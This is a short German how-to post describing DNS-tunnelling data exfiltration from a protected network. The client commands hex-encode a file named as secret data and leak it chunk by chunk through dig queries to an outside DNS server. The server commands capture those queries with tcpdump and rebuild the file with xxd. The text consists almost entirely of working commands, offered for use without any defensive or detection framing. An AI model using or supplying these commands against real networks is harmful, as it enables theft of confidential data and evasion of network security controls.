Wie man aus einem geschützten Netzwerk Daten per DNS kopieren kann, ist eigentlich ganz einfach. Man braucht dazu lediglich tcpdump und einen Hex-Editor wie xxd.

DNS Server:

$ tcpdump -enni <INTERFACE> 'port 53 and host <IP>' -w geheimdaten.pcap
$ tcpdump -n -r geheimdaten.pcap 'host <DNSIP> and host <CLIENTIP>' \
  | grep fakenews | cut -d ' ' -f 9 | cut -d '.' -f 1 \
  | uniq > geheimdaten.pcap.hex
$ xxd -r -p < geheimdaten.pcap.hex

Client:

$ xxd -p geheimdaten.txt > geheimdaten.txt.hex
$ for i in `cat geheimdaten.txt.hex`; do dig $i.fakenews.<DNSSERVER>; done